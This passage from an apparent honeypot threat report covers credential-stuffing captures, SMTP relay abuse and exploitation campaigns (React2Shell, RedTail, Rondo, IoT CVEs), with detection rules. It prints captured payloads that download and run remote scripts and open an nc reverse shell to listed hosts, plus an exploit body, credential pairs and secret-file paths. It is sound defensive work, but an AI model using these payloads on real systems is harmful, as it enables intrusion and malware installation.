2password2793.80%Dictionary
3123452543.46%Sequential
41231742.37%Sequential
5123456781662.26%Sequential
6345gs5662d341622.21%Mirai botnet
71234567891582.15%Sequential
83245gs5662d341572.14%Mirai botnet
91231231201.63%Repeating
1012341171.59%Sequential

Successful Credential Pairs (Honeypot Captures):

UsernamePasswordSource IPCountry
root1234167.71.10.33🇳🇱 Netherlands
supportsupport2009122.187.227.145🇮🇳 India
root123456121.166.191.164🇰🇷 South Korea
demotest211.24.41.44🇲🇾 Malaysia
rootashok123202.8.127.134🇮🇳 India
rootchangeme196.61.37.18🇬🇭 Ghana
useruser201931.173.0.26🇷🇺 Russia

Analyst Notes:

  • Cryptocurrency targeting: sol, solana, solv (validator) usernames show heavy targeting of Solana infrastructure - attackers targeting crypto validator nodes for fund theft
  • Service accounts: postgres, oracle show database infrastructure targeting
  • Mirai signatures: 345gs5662d34 username/password in password attempts indicates active Mirai botnet scanning for IoT devices

SMB Attack Analysis - NTLMv2-SSP Authentication Capture

Data Source: Baysec Windows honeypot
Total Authentication Attempts: Baysec honeypot captured 1,447,000+ SMB authentication events (December 2025)
Intelligence: Attackers attempting SMB authentication send NTLMv2-SSP credentials to the honeypot, revealing their usernames, domains, and crackable password hashes.
MITRE ATT&CK: T1021.002 - SMB/Windows Admin Shares

Top 10 Usernames in NTLM Captures:

UsernameCountOriginRisk Level
Administrator97,529Windows defaultCRITICAL
\\ (null/blank)79,211Anonymous authHIGH
admin61,455Common adminHIGH
User52,094GenericMEDIUM
for50,126Malformed requestMEDIUM
accounts49,870Targeted enumHIGH
DefaultAccount16,629Windows 10+MEDIUM
Cyrillic ѓ®бвм Ђ¤¬Ё­Ёбва в®а15,400+🇷🇺 Russian (corrupted encoding)HIGH
WDAGUtilityAccount12,818Windows Defender AGLOW
hp10,476HP device defaultMEDIUM

Top 10 Attacking IPs for NTLM Capture:

IP AddressHash CountCountryASN/ISP
189.124.135.3371,594🇧🇷 BrazilTelefônica Brasil
113.160.186.257,198🇻🇳 VietnamVNPT (Hospital)
41.35.41.9041,033🇪🇬 EgyptTE Data
85.175.217.9034,368🇷🇺 RussiaBeeline
168.149.46.16534,285🇺🇸 USAMicrosoft
197.43.35.23031,001🇪🇬 EgyptTE Data
191.6.143.14230,822🇧🇷 BrazilClaro S.A.
213.177.102.8927,830🇷🇺 RussiaJSC Rostelecom
41.33.252.14726,327🇪🇬 EgyptTE Data
194.158.193.2225,575🇧🇾 BelarusBeltelecom

Sample Captured Hash (attacker-sourced):

1
Isaac:::f020e5b9c858043a:4A91B24B9B69CDFDC5988050076DB8BC:0101000000000000003F7EA04F6FDC01...

Intelligence Value: Windows honeypot captures NTLM hashes that attackers inadvertently send when attempting to authenticate. These are attacker credentials - revealing usernames, domain configurations, and potentially crackable passwords captured from threat actor infrastructure.


Persistent Threat Sources: Egypt & Russia Deep Dive

Assessment: IPs from Egypt and Russia represent persistent, high-volume threat sources across multiple attack vectors. Both show sustained activity throughout December 2025 with distinct operational patterns.

🇪🇬 Egyptian IPs Threat Assessment
MetricValue
Total Attack Volume2,437,000+ events
Primary ProtocolSMB (TCP/445)
SecondaryNTLM credential harvesting
SSH ActivityMinimal
Primary ISPTE Data (Telecom Egypt)

Top Egyptian Attacking IPs:

IP AddressEventsAttack TypeASN
41.35.41.90186,396SMB brute force, NTLM captureTE-AS
197.43.35.230142,845Mixed protocolTE-AS
41.33.252.14711,654NTLM hash harvestingTE-AS

Top Egyptian Usernames Captured (SMB/NTLM):

UsernameCount
Administrator48,019
moh2,051
Isaac1,924
Fady1,924
managsaied1,235
alaa1,207
mohamed983
Ahmed816
norhan816
salma810
Hassan714
Khaled713

Operational Pattern: Egyptian IPs focus exclusively on Windows/SMB environments. No SSH activity observed. Targeting suggests Windows Active Directory credential harvesting for lateral movement or resale.

🇷🇺 Russian IPs Threat Assessment
MetricValue
Total Attack Volume1,103,000+ events
Primary ProtocolsSSH, SMB, NTLM, General TCP
Attack StyleMulti-vector, persistent
Primary ISPsRostelecom, Selectel, Beeline

Top Russian Attacking IPs:

IP AddressEventsAttack TypeASN
213.177.102.8920,220SMB, SSH, MixedJSC Rostelecom
185.22.24.17514,666SMB, SSH, MixedSelectel
82.204.234.11012,502SMB, SSH, NTLMPJSC Rostelecom
91.135.146.16310,116SMB, SSH, MixedJSC RTComm.RU
87.76.12.436,638SMB, SSH, MixedJSC Rostelecom
92.38.31.296,501SMB, SSH, MixedSelectel
94.141.60.925,017SMB, SSH, MixedJSC Rostelecom
95.70.94.1774,988SMB, SSH, MixedJSC Rostelecom

Top Russian Usernames Captured (SMB/NTLM):

UsernameCountAnalysis
Nasyy1,849Russian nickname
progadmin1,848“Program Admin” - service account
Admin1,617Generic admin
Sergey462Russian name (Сергей)
USR1CV84621C:Enterprise user - Russian ERP
marina462Russian name (Марина)
operatorent462“Enterprise Operator”
aleksey461Russian name (Алексей)
formozasvc461Service account
artem460Russian name (Артём)
yula460Russian name (Юля)
igor459Russian name (Игорь)

Cyrillic Username Analysis:

Raw CaptureDecoded (Windows-1251)CountMeaning
ѓ®бвмГость15,441Guest
Ђ¤¬Ё­Ёбва в®аАдминистратор15,182Administrator
ЃгеЈ «вҐаЁпБухгалтерия1,102Accounting Dept
的使用者帳戶(Chinese)2,494User Account

Operational Pattern: Russian IPs demonstrate multi-protocol capabilities - attacking SSH, SMB, and web services simultaneously. The scale (20,000+ events from single IPs) and persistence suggest organized campaigns rather than opportunistic scanning.

Key Finding: Russian and Egyptian IPs are major persistent threat sources. Russian IPs show sophisticated multi-vector capabilities while Egyptian ones focuse exclusively on Windows credential harvesting. Both warrant enhanced monitoring and blocking.


Targeted Services Summary

PortServiceActivity LevelAttack Type
445SMBCRITICALNTLM brute force, share enum
1433MSSQLVERY HIGHCredential brute force
3389RDPHIGHAuthentication attacks
25SMTPHIGHOpen relay abuse, credential brute force
22SSHHIGHCredential stuffing
5985/5986WinRMMEDIUMRemote execution
389LDAPMEDIUMDirectory enumeration
53DNSMEDIUMZone enumeration, tunneling

SMTP Honeypot Analysis (Port 25)

Data Source: Baysec SMTP honeypot
Period: December 2025
Total Events: 2,582
Risk Level: HIGH - Threat actors actively attempt to abuse SMTP for phishing distribution

Baysec SMTP honeypot captured active attempts to abuse open mail relays for phishing and spam distribution. Attackers probe for misconfigured mail servers to distribute malicious emails without attribution.

Top SMTP Attackers
Source IPCountryEventsActivity
103.39.64.54🇮🇳 India1,095AUTH LOGIN brute force
45.144.212.19Unknown1,038AUTH LOGIN brute force
45.144.212.238Unknown66AUTH LOGIN brute force
78.153.140.207🇷🇺 Russia49Phishing distribution attempt
87.251.78.220🇷🇺 Russia17Open relay testing, phishing
Observed Attack Patterns

1. Credential Brute Force (AUTH LOGIN)

1
2
3
4
EHLO User
AUTH LOGIN
[Base64 encoded credentials]
QUIT

Primary attackers: 103.39.64.54, 45.144.212.19 - high-volume automated credential stuffing against SMTP authentication.

2. Phishing Distribution Attempts

Attacker IPFrom AddressTargetCampaign Type
87.251.78.220accounts@globalfinancesolutions.combuddum119@hotmail.comFinancial phishing
77.83.39.209dpr@priv8shop.comdavebruce06@outlook.comUnknown
102.211.42.66office@cryptoyieldx.comcryptoyieldx@protonmail.comCryptocurrency scam
34.79.203.164info@pcsprojectmanager.cominfo@msthardware.caBusiness impersonation

3. Open Relay Testing

Multiple IPs from 158.94.x.x, 178.16.x.x, 185.169.x.x (Railnet LLC infrastructure) testing relay capabilities with spameri@tiscali.it sender - coordinated open relay reconnaissance.

4. Security Scanner Traffic

Legitimate scanner traffic excluded: Censys, Palo Alto Cortex Xpanse, cypex.ai, Reposify - reconnaissance traffic, not malicious.

Phishing Infrastructure Indicators
IndicatorTypeContext
accounts@globalfinancesolutions.comSenderFinancial phishing
office@cryptoyieldx.comSenderCrypto scam
dpr@priv8shop.comSenderUnknown campaign
87.251.78.220IPRussian phishing infrastructure
102.211.42.66IPAfrican phishing node

Assessment: Threat actors actively scan for and attempt to abuse misconfigured SMTP servers for phishing distribution. Organizations should ensure mail servers are not open relays and implement proper authentication (SPF, DKIM, DMARC).


Observed Campaign: React2Shell Exploitation (CVE-2025-55182)

Vulnerability: React Server Components RCE
Risk Level: CRITICAL
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 223+ (IDS-confirmed attacks)

Baysec honeypots captured 223+ confirmed React2Shell (CVE-2025-55182) exploit attempts from 26 unique source IPs across 11 days. Activity is persistent automated mass scanning with payloads containing active C2 callbacks, staged malware downloads, and reverse shell commands - clear evidence of weaponized exploitation beyond vulnerability scanning.

C2 INFRASTRUCTURE:

  • Staging: 94.154.35.154/weball.sh - post-exploitation script
  • Reverse Shell: 193.142.147.209:12323 - active listener
  • Malware Delivery: 5.255.121.141 - binary payload server
Attack Volume & Source IPs
Source IPCountryEventsRole
95.214.55.246🇵🇱 Poland78Primary scanner (persistent 11-day campaign)
193.142.147.209🇳🇱 Netherlands67C2 operator - reverse shell target (port 12323)
45.154.98.124🇳🇱 Netherlands31Actor 2 - uses 5.255.121.141 payload server
5.187.35.21🇪🇸 Spain14Vulnerability scanner (Go-http-client)
130.12.180.207🇺🇸 USA5Low-volume scanner
192.159.99.95🇬🇧 UK4Multi-vector scanner
194.127.199.125🇱🇺 Luxembourg2Reconnaissance
195.24.237.218🇷🇺 Russia2Reconnaissance
216.250.122.216🇺🇸 USA2Reconnaissance
84.234.98.89🇸🇪 Sweden2Reconnaissance
170.64.136.199🇺🇸 USA (DO)1DigitalOcean scanner
170.64.145.146🇺🇸 USA (DO)1DigitalOcean scanner
170.64.193.109🇺🇸 USA (DO)1DigitalOcean scanner
170.64.204.250🇺🇸 USA (DO)1DigitalOcean scanner
209.38.18.241🇺🇸 USA (DO)1DigitalOcean scanner
209.38.23.246🇺🇸 USA (DO)1DigitalOcean scanner

Timeline: 2025-12-17 → 2025-12-27 UTC (sustained 11-day campaign with daily activity)

C2 Infrastructure

Two distinct threat actors identified:

IndicatorTypeActorUsage
http://94.154.35.154/weball.shStaging URLActor 1Shell script download
193.142.147.209:12323C2 CallbackActor 1Reverse shell listener
http://5.255.121.141/nuts/...Payload URLActor 2Binary payload download
45.154.98.124ScannerActor 2Primary operator
weball.sh, /tmp/x.shPayloadsActor 1Post-exploitation scripts
/tmp/lrt, /dev/lrt, /dev/shm/lrtBinaryActor 2Staged binary locations

Actor 2 Characteristics:

  • Uses distinctive boundary marker (see IoCs below)
  • Downloads binary from 5.255.121.141
  • Writes to multiple locations (/tmp/lrt, /dev/lrt, /dev/shm/lrt) for persistence
  • Makes binary executable and runs in background
Targeted Endpoints

Attackers probed multiple paths across standard and non-standard ports:

EndpointPorts Targeted
/80, 88, 445
/api80, 88
/api/route80
/app80, 88
/_next80, 88
/_next/server80, 88
Exploit Technique

Attack Vector: RSC serialization exploitation via prototype pollution

Exploit Pattern (canonical):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('...')",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

RCE Payload Example (captured):

1
2
3
4
cd /tmp; wget -O /tmp/x.sh http://94.154.35.154/weball.sh;
chmod +x /tmp/x.sh; sh /tmp/x.sh;
rm /tmp/f; mkfifo /tmp/f;
cat /tmp/f|/bin/sh -i 2>&1|nc 193.142.147.209 12323 >/tmp/f
HTTP Indicators (Detection Signatures)

Custom Headers (HIGH confidence):

HeaderValue PatternOccurrencesNotes
Next-Actionx39RSC action trigger
Accepttext/x-componentRareRSC-specific content type
Content-Typemultipart/form-data; boundary=...AllCustom boundary patterns

Boundary Marker Variants (Actor Fingerprints):

Boundary PatternActorNotes
WebKitFormBoundaryx8jO2oVc6SWP3SadActor 1Used with weball.sh payload
WebKitFormBoundaryxtherespoopallovermeActor 2Distinctive boundary marker
WebKitFormBoundaryx883003851297VariantNumeric suffix pattern
B1766123121029386113ProbeTimestamp-based boundary

Boundary Pattern Analysis:

The distinctive boundary markers indicate:

  1. A specific exploit toolkit or threat actor
  2. Actor 2 downloads a binary payload rather than shell scripts

Targeted Ports (non-standard):

  • Port 80 (standard HTTP)
  • Port 88 (Kerberos - commonly exposed)
  • Port 445 (SMB - probing for web services on Windows)

User-Agents Observed:

1
2
3
4
5
6
7
8
9
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Chrome/Edge)  # Most common
Go-http-client/1.1                                                          # 5.187.35.21
Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv)         # Samsung Galaxy Z Fold
Mozilla/5.0 (iPhone; CPU iPhone OS 17_7...) CriOS/134.0.6998.99             # iOS Chrome
Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39)       # Old Android TV box
Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36                 # ChromeOS
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136
Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36                       # Generic Android
Mozilla/5.0                                                                 # Minimal

User-Agent Analysis: The variety of User-Agents (desktop, mobile, ChromeOS, Android TV) indicates the scanning toolkit rotates UAs to evade detection. The SM-F9560 (Samsung Galaxy Z Fold 6) and NEO-X5 (Android TV box) are unusual and may indicate spoofing or compromised devices.

Detection Signatures

Detection Strings (regex):

1
2
3
4
5
6
\$1:__proto__:then
\$1:constructor:constructor
process\.mainModule\.require\('child_process'\)
throw Object\.assign\(new Error\('NEXT_REDIRECT'\)
wget.*weball\.sh
nc\s+\d{1,3}(\.\d{1,3}){3}\s*12323
Detection Rules

IDS Rule:

1
2
3
4
5
alert http any any -> any any (msg:"React2Shell CVE-2025-55182 Exploit Attempt";
  flow:established,to_server; content:"POST"; http_method;
  content:"$1:__proto__:then"; http_client_body;
  content:"constructor:constructor"; http_client_body;
  classtype:web-application-attack; sid:2025551820; rev:1;)

WAF Rule:

1
2
3
4
Block if:
  HTTP POST AND
  Content-Type contains "multipart/form-data" AND
  Body matches /(\$1:__proto__:then|\$1:constructor:constructor|process\.mainModule)/

Network-Level Indicators:

  • Block egress to 193.142.147.209:12323 (reverse shell)
  • Block downloads from 94.154.35.154/weball.sh and 5.255.121.141
  • Alert on distinctive boundary markers (see IoC table)
Assessment
FactorFinding
Attack typeAutomated mass exploitation
SophisticationMEDIUM (public PoC + custom staging)
C2 presenceCONFIRMED (staging + reverse shell)
Successful exploitationNOT CONFIRMED in honeypot (designed to fail)
Risk to productionHIGH for unpatched Next.js/RSC
AttributionOpportunistic criminal scanning (no APT indicators)

Threat Actor Analysis: Opportunistic, automated scanning tools drive this activity, quickly incorporating CVE-2025-55182 post-disclosure. The variety of User-Agents and targeted endpoints indicates broad scanning. RCE payloads with C2 callbacks show attackers seek persistent access, not just vulnerability identification.

References
  • Baysec honeypot events (2025-12-17 → 2025-12-27)
  • CVE-2025-55182 public PoCs (GitHub)
  • Captured payloads and request bodies

Observed Campaign: RedTail Cryptominer & PHP CGI Exploitation (CVE-2024-4577)

Vulnerability: PHP CGI Argument Injection + Docker API targeting
Risk Level: CRITICAL
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 1,276+ (libredtail-http user-agent signature)

Baysec web honeypot captured 1,276+ exploitation attempts from 30+ unique source IPs (including IPv6) over 11 days, revealing four distinct threat patterns: mass exploitation of CVE-2024-4577 (PHP CGI Argument Injection), PHPUnit RCE exploitation (CVE-2017-9841), ThinkPHP RCE (CVE-2018-20062), and Docker API targeting.

Key Finding: RedTail operators demonstrate multi-vector capability, combining PHP exploitation with Docker API targeting and systematic credential harvesting. IPv6 infrastructure detected - attackers use 2001:41d0:601:1100::779b as primary scanner (162 events).

CVE-2024-4577 Mass Exploitation

Vulnerability Profile:

AttributeValue
CVECVE-2024-4577
CVSS v39.8 CRITICAL
EPSS94.37% (Top 0.04%)
TypePHP CGI Argument Injection (Windows)
StatusCISA KEV Listed

Attack Vector Observed:

1
2
3
4
5
6
GET /cgi-bin/%%32%65%%32%65/.../bin/sh
GET /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
POST: <?php shell_exec(base64_decode("(wget --no-check-certificate -qO-
      https://178.16.55.224/sh || curl -sk https://178.16.55.224/sh)
      | sh -s cve_2024_4577.selfrep")); ?>
User-Agent: libredtail-http

C2 Infrastructure: 178.16.55.224 (USA, Railnet LLC) - 15 malicious detections on VirusTotal, self-signed certificate infrastructure.

RedTail Cryptominer - PHP CGI & Docker API Targeting

Evolution Assessment: RedTail has expanded from traditional cryptomining operations to targeting containerized infrastructure via exposed Docker APIs. Security researchers first observed this tactical evolution in public reporting November 2025.

Source IPCountryEventsRole
2001:41d0:601:1100::779b🇫🇷 France (IPv6)162Primary scanner - IPv6 infrastructure
163.5.148.15🇫🇷 France94PHP CGI + PHPUnit RCE scanner
62.146.234.188🇩🇪 Germany72Multi-vector scanner
152.42.188.148🇸🇬 Singapore66PHP CGI exploitation
178.128.89.216🇸🇬 Singapore66PHP CGI exploitation
103.168.91.76Unknown47PHPUnit RCE scanner
144.126.203.185🇺🇸 USA47Multi-vector scanner
152.69.216.125🇺🇸 USA47PHP CGI exploitation
157.173.105.78🇬🇧 UK47PHPUnit RCE scanner
158.220.81.232🇨🇭 Switzerland47PHP CGI probing
165.154.231.140🇨🇦 Canada47Multi-vector scanner
173.249.5.123🇩🇪 Germany47Multi-vector scanner
207.244.246.26🇺🇸 USA47PHP CGI exploitation
216.108.237.50🇺🇸 USA47PHP CGI exploitation
217.154.69.208🇬🇧 UK47PHPUnit RCE scanner
45.192.10.196🇿🇦 South Africa47PHP CGI exploitation

Timeline: 2025-12-17 → 2025-12-27 UTC (continuous 11-day campaign with daily activity)

Significance: RedTail’s pivot to Docker infrastructure indicates opportunistic targeting of cloud-native environments. Organizations with exposed Docker APIs face dual risk: cryptomining resource abuse and potential container escape. Activity is geographically distributed across 9 countries with no single dominant source.

Credential Harvesting Campaign

Attribution: Russian-nexus infrastructure (operators host via UK proxy)
Primary Sources: 78.153.140.179, 78.153.140.224
Events: 61 combined

Targeted Paths:

1
2
3
4
5
6
/secrets/aws/session.yml
/private/.env.production
/staging/.env.production
/config/aws_settings.php
/aws/konfig/aws_auth.php
/.env

Assessment: Systematic enumeration targeting AWS credentials and application secrets. Pattern indicates automated tooling scanning for misconfigured deployments.

PHP Framework Exploitation

Multiple PHP framework RCE attempts captured:

FrameworkExploit PathRisk
ThinkPHP/index.php?s=/index/\think\app/invokefunctionRCE
PHPUnit/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.phpRCE
Pearcmd/index.php?lang=/../../../usr/local/lib/php/pearcmdRCE
Attack Source Analysis
Source IPCountryEventsActivity
163.5.148.15🇫🇷 France44RedTail scanner
173.249.5.123Unknown44Multi-vector scanning
78.153.140.179🇷🇺 Russia (UK hosted)31Credential harvesting
78.153.140.224🇷🇺 Russia (UK hosted)30Credential harvesting
188.237.58.92🇲🇩 Moldova16Protocol attacks
Detection Signatures

User-Agent Detection:

1
2
3
libredtail-http                              # RedTail fingerprint
Mozilla/5.0 (compatible; CensysInspect/1.1)  # Reconnaissance
Mozilla/5.0 zgrab/0.x                        # Zgrab scanner

Path-Based Detection (WAF/IDS):

1
2
3
4
5
.*\.env.*
.*eval-stdin\.php.*
.*think\\app.*invokefunction.*
.*pearcmd.*
.*allow_url_include.*
Risk Assessment
ThreatSeverityEPSS/LikelihoodImpact
CVE-2024-4577CRITICAL94.37%RCE, full system compromise
RedTail DockerHIGHMEDIUMCryptomining, container escape
Credential HarvestingHIGHHIGHAWS account compromise
PHP Framework RCEHIGHMEDIUMApplication takeover
References

Observed Campaign: Cisco VPN (AnyConnect) Probing (CVE-2020-3452)

Threat Type: Vulnerability Reconnaissance
Risk Level: MEDIUM
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Total Events: 73

Baysec honeypots captured 73 probing attempts targeting Cisco AnyConnect VPN infrastructure from 19 unique source IPs - all originating from DigitalOcean infrastructure. The coordinated nature (4 events per IP, identical patterns) indicates automated reconnaissance tooling.

Targeted Endpoints
PathEventsPurpose
/+CSCOL+/Java.jar19Java applet exploitation attempt
/+CSCOE+/logon_forms.js18Login form fingerprinting
/+CSCOE+/transfer.js18File transfer probe
/+CSCOL+/a1.jar18Java applet exploitation attempt
Source IPs (DigitalOcean Infrastructure)
Source IPEventsNotes
104.248.12.124DigitalOcean NYC
129.212.227.1334DigitalOcean
137.184.178.2194DigitalOcean NYC
137.184.254.1364DigitalOcean NYC
137.184.26.124DigitalOcean NYC
138.68.141.224DigitalOcean NYC
147.182.254.1574DigitalOcean
159.223.107.2414DigitalOcean SF
162.243.96.904DigitalOcean NYC
165.22.228.964DigitalOcean
170.64.138.2314DigitalOcean SFO
178.128.242.604DigitalOcean LON
178.128.86.2404DigitalOcean AMS
206.189.40.2434DigitalOcean NYC
209.38.28.1344DigitalOcean
64.225.120.1364DigitalOcean NYC
64.225.51.2464DigitalOcean NYC
64.227.39.1364DigitalOcean NYC
134.209.7.541DigitalOcean
Assessment

Pattern Analysis:

  • All 19 IPs performed exactly 4 requests (one per path)
  • All hosted on DigitalOcean infrastructure
  • Targeting Cisco AnyConnect SSL VPN authentication/Java components
  • Indicative of vulnerability scanning for CVE-2020-3452 (Cisco ASA Path Traversal) or similar

Risk: Organizations running Cisco ASA/FTD with AnyConnect should:

  • Ensure patched against CVE-2020-3452 (CVSS 7.5)
  • Monitor for /+CSCOE+/ and /+CSCOL+/ path access
  • Block DigitalOcean ranges if not expected traffic source

Observed Campaign: Rondo Botnet (Mirai Variant)

Threat Type: IoT Botnet / Multi-Vector Scanner
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 441+

Baysec honeypots captured 441+ exploitation attempts from the Rondo botnet, a Mirai variant targeting IoT devices and web applications. The botnet employs multiple attack vectors simultaneously, including Shellshock (CVE-2014-6271), PHPUnit RCE (CVE-2017-9841), and OpenWRT LuCI command injection (CVE-2023-1389).

Key Finding: Rondo operators embed their email attribution signature (rondo2012@atomicmail.io) directly in User-Agent strings and Shellshock payloads - unusual OPSEC failure suggesting amateur operators or deliberate false flag.

Attack Infrastructure
ComponentValueNotes
Primary Scanner192.159.99.95United Kingdom
C2/Payload Server41.231.37.153Tunisia (Tunisie Telecom)
Contact Emailrondo2012@atomicmail.ioEmbedded in payloads
Payload Scriptsrondo.*.shMultiple variants
Exploitation Vectors

1. Shellshock (CVE-2014-6271) - User-Agent Injection:

1
User-Agent: () { :; }; /bin/bash -c "(wget -qO- http://41.231.37.153/rondo.ame.sh||busybox wget -qO- http://41.231.37.153/rondo.ame.sh||curl -s http://41.231.37.153/rondo.ame.sh)|sh"& # rondo2012@atomicmail.io

Targets: /cgi-bin/slogin/login.py, /cgi-bin/jarrewrite.sh

2. OpenWRT LuCI Command Injection (CVE-2023-1389):

1
2
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=`busybox wget -qO- http://41.231.37.153/rondo.zqq.sh|sh`
User-Agent: Mozilla/5.0 (rondo2012@atomicmail.io)

3. PHPUnit RCE (CVE-2017-9841):

1
2
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Body: <?php system('(wget -qO- http://41.231.37.153/rondo.dtm.sh||busybox wget -qO- http://41.231.37.153/rondo.dtm.sh||curl -s http://41.231.37.153/rondo.dtm.sh)|sh&'); ?>
Payload Variants Observed
ScriptTarget CVEDescription
rondo.ame.shCVE-2014-6271Shellshock exploitation
rondo.fve.shCVE-2014-6271Shellshock variant
rondo.qre.shCVE-2014-6271Shellshock variant
rondo.zqq.shCVE-2023-1389OpenWRT LuCI injection
rondo.dtm.shCVE-2017-9841PHPUnit exploitation
Detection Signatures
1
2
3
4
5
6
7
8
9
# User-Agent patterns
rondo2012@atomicmail\.io
Mozilla/5\.0 \(rondo2012@

# URL patterns
41\.231\.37\.153/rondo\.\w+\.sh

# Shellshock in headers
\(\)\s*\{\s*:\s*;\s*\}\s*;

Assessment: Rondo represents opportunistic mass scanning targeting legacy vulnerabilities in IoT devices. The embedded email signature and use of decade-old CVEs suggests low-sophistication operators. Primary risk is to unpatched routers and IoT devices that may be enrolled into DDoS botnets or cryptomining operations.


Observed Campaign: IoT & Network Device Exploitation

Threat Type: Multi-CVE Device Targeting
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 965+

Baysec honeypots captured 965+ exploitation attempts targeting IoT devices, network equipment, and exposed management interfaces. Attackers systematically probe for vulnerable Hikvision cameras, GPON routers, D-Link devices, and enterprise infrastructure.

Hikvision SDK Reconnaissance (CVE-2021-36260)

Vulnerability: Scanning for Command Injection endpoint
CVSS: 9.8 CRITICAL
Events: 18

Attackers probe for the /SDK/webLanguage endpoint to identify Hikvision cameras vulnerable to CVE-2021-36260. All captured requests were GET-based reconnaissance - no command injection payloads observed.

Source IPCountryEventsFirst SeenLast Seen
89.42.231.239🇷🇴 Romania11Dec 17Dec 26
5.187.35.158🇳🇱 Netherlands7Dec 21Dec 27

Request Pattern:

1
2
GET /SDK/webLanguage HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
GPON Router Reconnaissance

Scanning for: GPON Home Gateway vulnerabilities (CVE-2018-10561)
Events: 47

1
GET /GponForm/diag_Form?images/

Probing for vulnerable GPON routers. No command injection payloads observed.

Scanning for: D-Link HNAP interface
Events: 30

1
2
GET /HNAP1
GET /HNAP1/

Probing for D-Link routers with HNAP enabled. No SOAPAction exploitation payloads observed.

Apache Solr Reconnaissance

Scanning for: Apache Solr instances
Events: 109

EndpointEventsPurpose
/solr/admin/info/system64Version fingerprinting
/solr/admin/cores?action=STATUS&wt=json45Core enumeration
Docker Registry Reconnaissance

Scanning for: Exposed Docker registries
Events: 63

1
2
GET /v2/_catalog
GET /containers/json

Probing for unauthenticated Docker API access.

SAP NetWeaver Reconnaissance (CVE-2025-31324)

Scanning for: Vulnerable metadatauploader endpoint
CVSS: 10.0 CRITICAL
Events: 24

1
GET /developmentserver/metadatauploader

Probing for SAP NetWeaver instances. No file upload payloads observed.

GeoServer Reconnaissance (CVE-2024-36401)

Scanning for: GeoServer instances
CVSS: 9.8 CRITICAL
Events: 18

1
GET /geoserver/web/

Probing for GeoServer installations. No SQL injection payloads observed.

Apache Path Traversal (CVE-2021-41773 / CVE-2021-42013)

Vulnerability: Path Traversal → RCE via mod_cgi
CVSS: 9.8 CRITICAL
Events: 402

PatternEventsTechnique
/cgi-bin/%%32%65%%32%65/...75Double URL-encoded traversal
/cgi-bin/.%2e/.%2e/...75URL-encoded dot traversal
/cgi-bin/.%%32%65/...17Mixed encoding

Attack Payload (captured):

1
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1

This traverses to /bin/sh on vulnerable Apache 2.4.49/2.4.50 servers.

Source IPCountryEvents
192.159.99.95🇬🇧 UK (Rondo)100
147.124.204.3🇺🇸 USA22
163.5.148.15🇫🇷 France16
87.121.84.181🇧🇬 Bulgaria15
QNAP NAS Exploitation (CVE-2024-21899)

Vulnerability: Improper Authentication (CVE-2024-21899)
CVSS: 9.8 CRITICAL
Events: 52

1
GET /cgi-bin/authLogin.cgi

Attackers probe for QNAP NAS devices vulnerable to authentication bypass allowing unauthenticated access to device management.

InfluxDB Information Disclosure (CVE-2019-20933)

Vulnerability: Authentication Bypass (CVE-2019-20933)
CVSS: 9.8 CRITICAL
Events: 42

1
GET /query?q=SHOW+DIAGNOSTICS

Attackers probe for unauthenticated InfluxDB instances to extract internal configuration, credentials, and time-series data.

Realtek SDK Router Exploitation (CVE-2021-35395)

Vulnerability: Buffer Overflow leading to RCE (CVE-2021-35395)
CVSS: 9.8 CRITICAL
Events: 42

EndpointCredentialsEvents
/boaform/admin/formLogin(none)24
/boaform/admin/formLogin?username=ec8&psd=ec8ec8:ec89
/boaform/admin/formLogin?username=user&psd=useruser:user9

Targets routers with Realtek SDK - common in low-cost SOHO devices.

Netgear Router Exploitation

Vulnerability: Command Injection (CVE-2016-1555)
Events: 22

1
GET /cgi-bin/main-cgi
Miscellaneous Router CGI Attacks
EndpointEventsTarget
/apply.cgi42Generic router config
/cgi-bin/login28Authentication probe
/cgi-bin/httpd.cgi12Various routers
/cgi-bin/login.cgi11Authentication probe
/cgi-bin/system_mgr.cgi9System management
WinRM Exploitation

Protocol: Windows Remote Management
Events: 219
Period: Dec 17 → Dec 26

Source IPCountryEvents
103.203.76.79🇮🇳 India13
108.216.136.255🇺🇸 USA13
111.92.61.249🇮🇳 India13
113.160.1.118🇻🇳 Vietnam13
114.143.212.195🇮🇳 India13
117.192.9.243🇮🇳 India13
124.106.67.118🇵🇭 Philippines13
125.229.26.140🇹🇼 Taiwan13
39.109.104.26🇸🇬 Singapore13
41.210.171.82🇰🇪 Kenya13
43.224.8.199🇧🇩 Bangladesh13
1
2
POST /wsman HTTP/1.1
User-Agent: Python WinRM client

Assessment: Coordinated scanning campaign from Asian IP addresses targeting Windows hosts with exposed WinRM. Pattern suggests botnet-controlled scanning infrastructure.


Observed Campaign: Environment & Secrets Harvesting

Threat Type: Credential Theft / Reconnaissance
Risk Level: HIGH
Status: ACTIVE
Period: 2025-12-17 → 2025-12-27
Events: 1,883+

Baysec honeypots captured 1,883+ requests targeting environment files, Git repositories, and cloud credentials. This represents systematic automated scanning for exposed secrets in web applications.

Environment File Scanning

Total Events: 1,761

